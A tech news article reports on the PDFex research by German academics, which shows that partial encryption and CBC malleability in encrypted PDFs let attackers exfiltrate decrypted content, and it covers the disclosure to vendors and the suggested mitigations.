PDF flaw lets hackers read password-protected documents, researchers say

Researchers have developed a new technique that allows attackers to extract contents of a password-protected or encrypted PDF file under special conditions.

In a paper — titled “Practical Decryption exFiltration: Breaking PDF Encryption” — German academics from Ruhr-University Bochum and Münster University of Applied Sciences disclosed two different variations of the attack that left over 23 widely used PDF viewers, including Adobe Acrobat Reader, Evince, and Chrome and Firefox’s built-in PDF viewers, vulnerable.

Called PDFex, the attack exploits security weaknesses in the standard encryption protection built into the Portable Document Format, also known as PDF.

The method doesn’t attempt to crack the password of an encrypted PDF document. It rather works by taking advantage of partial encryption supported natively by the PDF specification to remotely exfiltrate content once a user opens that document.

The 💜 of EU tech

The latest rumblings from the EU tech scene, a story from our wise ol' founder Boris, and some questionable AI art. It's free, every week, in your inbox. Sign up now!

“Even without knowing the corresponding password, the attacker possessing an encrypted PDF file can manipulate parts of it,” the researchers said. “More precisely, the PDF specification allows the mixing of ciphertexts with plaintexts. In combination with further PDF features which allow the loading of external resources via HTTP, the attacker can run direct exfiltration attacks once a victim opens the file.”

In other words, an attacker can modify a password-protected PDF file in such a way that when it’s opened with the right password, a copy of the decrypted content is automatically transmitted to a remote server controlled by the attacker via a PDF form, URL, or JavaScript code.

More worryingly, the direct exfiltration achieved by tampering the unencrypted plaintext data through PDF forms doesn’t even require any sort of user interaction.

The second variation of the attack does something similar, but unlike the aforementioned method, it utilizes only using the encrypted bits of the PDF file. It makes use of Cipher Block Chaining (CBC) mode of encrypting blocks of plaintext to transform a piece of ciphertext into another ciphertext, a property in cryptography called malleability.

CBC mode employs a chaining mechanism to encrypt data, which means that encryption of each plaintext block depends on the immediately preceding ciphertext block. As a result, it is necessary to know a “plaintext segment” in order to directly manipulate an encrypted object, the researchers noted.

The academics have responsibly disclosed their findings to all affected vendors and also released proof-of-concept exploits for PDFex attacks to the public.

“Many data formats allow to encrypt only parts of the content (e.g., XML, S/MIME, PDF),” the team said. “This encryption flexibility is difficult to handle and allows an attacker to include their own content, which can lead to exfiltration channels.”

To mitigate the attack, the researchers suggest dropping support for partially encrypted PDF files, or enforcing a policy where unencrypted objects are not allowed to access encrypted content.

“In the long term, the PDF 2.x specification should drop support for mixed content altogether,” they concluded, adding the plethora of PDF features, as well as the flexibility of the format, makes it susceptible to plaintext exfiltration attacks.